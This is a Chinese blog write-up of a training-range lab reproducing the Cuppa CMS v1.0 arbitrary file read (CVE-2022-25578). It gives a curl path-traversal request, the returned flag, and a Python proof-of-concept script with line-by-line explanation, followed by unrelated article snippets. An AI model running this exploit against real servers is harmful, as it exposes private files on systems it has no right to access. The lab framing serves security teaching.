Cuppa CMS v1.0 任意文件读取漏洞(CVE-2022-25578)

news2024/11/16 3:23:47

前言

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。
教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。
竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。
资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Cuppa CMS 是一个开源的内容管理系统(CMS),它提供了一个简单易用的平台,让用户可以轻松创建和管理网站内容。以下是关于 Cuppa CMS 的一些基本信息:

主要特点

  1. 开源:Cuppa CMS 是完全开源的,这意味着用户可以自由地下载、修改和分发它。
  2. 易于使用:它提供了一个直观的用户界面,使得非技术用户也能轻松管理网站内容。
  3. 模块化:系统采用模块化设计,用户可以根据需要安装和启用不同的功能模块。
  4. 多语言支持:支持多种语言,方便进行国际化和本地化。
  5. 响应式设计:支持响应式设计,确保网站在各种设备上都能良好显示。
  6. SEO 优化:内置基本的搜索引擎优化(SEO)功能,帮助网站内容更好地被搜索引擎收录和索引。
  7. 社区支持:拥有活跃的开发社区和用户社区,用户可以在社区中获取支持、分享经验和解决问题。

功能

  • 内容管理:允许用户创建、编辑和管理网页内容,包括文本、图片和视频等。
  • 用户管理:提供用户权限管理功能,管理员可以定义不同用户角色及其对系统功能的访问权限。
  • 插件和扩展:支持通过插件和扩展来增强系统功能。
  • 模板系统:提供多种预设模板,用户可以根据需要选择或自定义模板。
  • 数据备份与恢复:支持数据的备份与恢复,确保网站数据的安全。

安全性

Cuppa CMS 致力于提供安全的管理平台,但和其他任何软件一样,它也可能存在安全漏洞。用户应定期更新系统和插件,以防止已知漏洞的利用。此外,合理的权限管理、输入验证和安全配置也是确保系统安全的重要措施。

社区

Cuppa CMS 拥有一个活跃的社区,用户可以在社区中获取帮助、分享经验、下载插件和模板等。社区的支持对于新用户和开发者来说都是非常重要的资源。

使用场景

Cuppa CMS 适合用于建设各种类型的网站,包括企业网站、个人博客、电子商务网站等。它的灵活性和易用性使其成为许多用户的首选 CMS。

总结

Cuppa CMS 是一个功能丰富且易于使用的开源内容管理系统,适合不同水平的用户。通过合理的配置和维护,用户可以利用它构建安全、稳定且功能强大的网站。

漏洞复现

打开靶场

可以看到是个登录框,但是咱们没有账号密码 

因为题目给出了具体位置,所以可以使用 curl 爆破访问

┌──(root㉿kali)-[~]
└─# curl -X POST "http://eci-2zef5x211e7htbzlsos8.cloudeci1.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../flag"
<style>
    body{ overflow: hidden; }
    .w_right{
        position: fixed;
        background: #fff;
        top: 50px;
        bottom: 0px;
        right: 0px;
        width: 93%;
        z-index: auto ;
        right: -100%;
        overflow: auto;
        overflow-x: hidden;
        box-shadow: 0px 2px 8px rgba(0,0,0,0.2);
    }
/* Responsvie */
    .r1200 .w_right{ width: 99% !important; }
    .r1100 .w_right{ width: 100% !important; }
</style>
<script>
    w_right = {}
    //++ end
        w_right.end = function(){
            cuppa.removeEventGroup("w_right");
        }; cuppa.addRemoveListener(".w_right", w_right.end);
    //--
    //++ close
        w_right.close = function(){
            $(".ace_autocomplete").hide();
            var w_right = $(".w_right").last();
            TweenMax.to(w_right, 0.3, {right:"-100%", ease:Cubic.easeIn, onComplete:function(){
                cuppa.setContent({load:false, name:".window_right", last:true});
                cuppa.blockade({load:false, name:".blockade_w_right", duration:0.2, last:true});
                cuppa.tinyMCEDestroy();
            }});
        }
    //--
    //++ init
        w_right.init = function(){
            TweenMax.to(".w_right", 0.4, {right:0, ease:Cubic.easeOut});
        }; cuppa.addEventListener("ready",  w_right.init, document, "w_right");
    //--
</script>
<div class="w_right">
    flag{540cefe9-693e-4463-882f-cce203b8eeb2}</div>                                                                                                                                    

当然,也可以使用 Poc

import requests
from lxml import etree


headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 '
                  'Safari/537.36',
}


def CVE_2022_25401(url, fila_name):
    url += "/templates/default/html/windows/right.php"
    print(url)
    data = {
        "id": 1,
        "path": "component/table_manager/view/cu_views",
        "uniqueClass": "window_right_246232",
        "url": "../../../"+fila_name
    }
    res = requests.post(url, data=data, headers=headers)
    soup = etree.HTML(res.content)
    file_content = soup.xpath('//div[@class="w_right"]/text()')[0]
    print(file_content)


if __name__ == '__main__':
    url = "http://eci-2zef5x211e7htbzlsos8.cloudeci1.ichunqiu.com"
    file_name = "flag"
    CVE_2022_25401(url, file_name)
  • requests: 用于发送HTTP请求。
  • etree (来自 lxml): 用于解析HTML内容。
  • headers: 定义HTTP请求头,用于伪装成普通浏览器的请求,避免被服务器过滤。
  • url: 漏洞目标的基础URL。
  • fila_name: 要读取的文件名。
  • url += "/templates/default/html/windows/right.php": 构造目标请求URL,指向存在漏洞的PHP文件。
  • print(url): 打印构造的URL,便于调试。
  • data: 构造POST请求的数据。
    • "id": 1: 示例参数,通常用于指定某种ID。
    • "path": "component/table_manager/view/cu_views": 示例路径参数。
    • "uniqueClass": "window_right_246232": 示例参数,通常用于指定某种唯一标识。
    • "url": "../../../"+fila_name: 利用路径遍历漏洞,尝试读取服务器上任意位置的文件。
  • res = requests.post(url, data=data, headers=headers): 发送POST请求,尝试利用漏洞读取文件。
  • soup = etree.HTML(res.content): 使用 lxml 库解析返回的HTML内容。
  • file_content = soup.xpath('//div[@class="w_right"]/text()')[0]: 使用XPath语法从解析的HTML中提取目标文件内容。
  • print(file_content): 打印读取到的文件内容。
  • url: 漏洞目标的基础URL。
  • file_name: 要读取的文件名。
  • 调用 CVE_2022_25401 函数,传入目标URL和文件名,尝试读取服务器上的文件内容。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1950009.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

mysql字符类型字段设置默认值为当前时间

-- 2024-07-22 10:22:20 select (DATE_FORMAT(CURRENT_TIMESTAMP, %Y-%m-%d %H:%i:%s)); ALTER TABLE tablename MODIFY COLUNN CREATE_DATE varchar (23) DEFAULT(DATE_FORMAT(CURRENT_TIMESTAMP, %Y-%m-%d %H:%i:%s)) COMMENT "创建日期;

新校区,新视野——广州六中以太彩光打造智慧教育新高地

广州市第六中学总务处 林继青 广州市第六中学是拥有85年办学历史的著名市重点中学,也是广东省首批一级学校和国家级示范性高中。作为广州市首批智慧校园建设示范单位,广州第六中学在从化、花都新建校区的智慧校园建设中“破旧立新”,让先进的以太全光技术与学校新校区建设同频共…

CVE-2024-39700 (CVSS 9.9):JupyterLab 模板中存在严重漏洞

在广泛使用的 JupyterLab 扩展模板中发现了一个严重漏洞&#xff0c;编号为CVE-2024-39700 。此漏洞可能使攻击者能够在受影响的系统上远程执行代码&#xff0c;从而可能导致大范围入侵和数据泄露。 该漏洞源于在扩展创建过程中选择“测试”选项时自动生成“update-integratio…

基于 HTML+ECharts 实现智慧安防数据可视化大屏(含源码)

构建智慧安防数据可视化大屏&#xff1a;基于 HTML 和 ECharts 的实现 随着科技的不断进步&#xff0c;智慧安防系统已经成为保障公共安全的重要工具。通过数据可视化&#xff0c;安防管理人员可以实时监控关键区域的安全状况、人员流动以及设备状态&#xff0c;从而提高应急响…

TikTok批量养号方法

想要在TikTok平台上批量养号&#xff0c;确保账号的健康与活跃度非常重要&#xff0c;不然等于白干。下面&#xff0c;我们就来详细探讨一下TikTok养号的几个关键步骤。 首先&#xff0c;新注册的账号必须严格遵守一机一号一IP的原则。随着TikTok平台在识别IP技术方面的不断进步…

叶再豪老师-降龙精英课程

文章目录 1.思维认知1.1 稻盛和夫成功公式1.2 龙头主升模式1.3 龙头主升-两种路径1.4 股市新手的炒股思路1.5 龙头案例1.6 降龙心法 2.情绪周期2.1 情绪周期2.1 情绪演绎周期2.2 情绪的四个部分2.2.1 指数的情绪周期2.2.3 热点情绪周期2.2.4 热点情绪演绎周期2.2.5 大热点支线2…

CDGA|数据治理:安全如何贯穿数据供给、流通、使用全过程

随着信息技术的飞速发展&#xff0c;数据已经成为企业运营、社会管理和经济发展的核心要素。然而&#xff0c;数据在带来巨大价值的同时&#xff0c;也伴随着诸多安全风险。因此&#xff0c;数据治理的重要性日益凸显&#xff0c;它不仅仅是对数据的简单管理&#xff0c;更是确…

JAVA基础知识4(static、继承)

JAVA基础知识4 static静态成员变量静态成员方法解释注意点 继承父类&#xff08;基类或超类&#xff09;子类&#xff08;派生类&#xff09;使用继承的示例解释运行结果 成员变量的访问特点成员方法的访问特点构造方法的访问特点 Java项目&#xff0c;包和类之间的联系包的概念…

【Linux】玩转操作系统,深入刨析进程状态与调度机制

目录 1. 进程排队2. 进程状态的表述2.1. 进程状态2.2 运行状态2.3. 阻塞状态2.4. 挂起状态 3. Linux下具体的进程状态3.1. 运行状态R3.2. 可中断睡眠状态S3.3. 不可中断睡眠状态D3.4. 停止状态T3.5. 死亡状态X3.6. 僵尸状态Z 4. 孤儿进程5. 优先级6. Linux的调度与切换6.1. 四个…

[代码审计]记一次简单的java代码审计

如果觉得该文章有帮助的&#xff0c;麻烦师傅们可以搜索下微信公众号&#xff1a;良月安全。点个关注&#xff0c;感谢师傅们的支持。 免责声明 本博客所发布的所有内容&#xff0c;包括但不限于信息、工具、项目以及文章&#xff0c;均旨在提供学习与研究之用。所有工具安全…

《代码大全》读书笔记-第Ⅰ部分 奠定基础

0.欢迎来到软件构建世界 什么是软件构件&#xff1a; 对于非正式及项目&#xff0c;会觉得罗列出来的这些活动太过于繁复。但是这些对于正式项目都是很有必要的(大部分人都没经历过&#xff0c;比如说我)。一般一些小公司主要也就是需求分析、编码、开发人员自测、集成测试这几…

数据库第五次作业

1. 触发器 建立触发器&#xff0c;订单表中增加订单数量后&#xff0c;商品表商品数量同步减少对应的商品订单出数量,并测试 建立触发器&#xff0c;实现功能:客户取消订单&#xff0c;恢复商品表对应商品的数量 建立触发器&#xff0c;实现功能:客户修改订单&#xff0c;商品…

步入新时代,使用区块链服务API打造创新应用

随着区块链技术的兴起&#xff0c;我们正步入一个全新的数据时代——一个由透明性、安全性和去中心化定义的时代。Blockchain公司的区块链API&#xff0c;作为连接现实世界与区块链世界的桥梁&#xff0c;为全球开发者和企业提供了一种前所未有的方式&#xff0c;以访问、交互并…

文件共享功能无法使用提示错误代码0x80004005【笔记】

环境情况&#xff1a; 其他电脑可以正常访问共享端&#xff0c;但有一台电脑访问提示错误代码0x80004005。 处理检查&#xff1a; 搜索里输入“启用或关闭Windows功能”按回车键&#xff0c;在“启用或关闭Windows功能”里将“SMB 1.0/CIFS文件共享支持”勾选后&#xff08;故…

屏幕管控——保护文档内容安全

屏幕管控是保护文档内容安全的重要手段之一&#xff0c;它涉及到对终端屏幕的使用、访问权限、内容展示以及操作行为的监控和管理。专业的企业级防泄密系统&#xff0c;如金刚钻信息&#xff0c;会有一些专业功能针对屏幕这块有对应的防护措施。 一、屏幕水印设置 屏幕水印是…

外卖霸王餐系统推荐,哪家的系统比较稳定呢?

以下是一些较为稳定且有一定用户基础的外卖霸王餐系统&#xff0c;你可以根据自身需求进一步考察和选择&#xff1a; - **饭否霸王餐**&#xff1a;有专门的APP&#xff0c;如在应用宝上其开发商为南京有惠鲸选电子商务有限公司。它覆盖了多个城市&#xff0c;提供美团、饿了么…

从0到1,AI我来了- (1)从AI手写数字识别开始

前两篇我们我们把控制台、Python环境Anaconda 搞定了&#xff0c;接下来&#xff0c;我们快速进入主题&#xff0c;把AI 界的“Hello World” 实现一下&#xff0c;有个感觉&#xff0c;再逐步了解一些AI的概念。 1、Pytorch 安装 1) 什么是Pytorch? 一个深度学习框架&#…

C语言常见字符函数和字符串函数精讲

目录 引言 一、字符函数 1.字符分类函数 2.字符转换函数 二、字符串函数 1.gets、puts 2.strlen 3.strcpy 4.strncpy 5.strcat 6.strncat 7.strcmp 8.strncmp 9.strstr 10.strchr 11.strtok 12.strlwr 13.strupr 引言 在C语言编程中&#xff0c;字符函数…

第二证券:股票交易费用有哪些?

出资者生意股票是需求付出生意费用的&#xff0c;一般来说股票的生意费用主要有以下几种&#xff1a; 1、证券公司佣金。这是证券公司收取的一种服务费&#xff0c;用于供给股票生意的途径和服务。证券公司佣金的份额由证券公司自行拟定&#xff0c;但最高不得超越成交金额的0…

elasticsearch8.14.1集群安装部署

elasticsearch安装部署&#xff0c;首先需要准备至少三台服务器&#xff0c;本例再windows11下安装三台vmware虚拟机&#xff0c;利用centOS7系统模拟服务器环境。 本例假设你已经安装了三台vmware和centOS7&#xff0c;且centOS7运行正常。接下来我们直接讲解elasticsearch下载…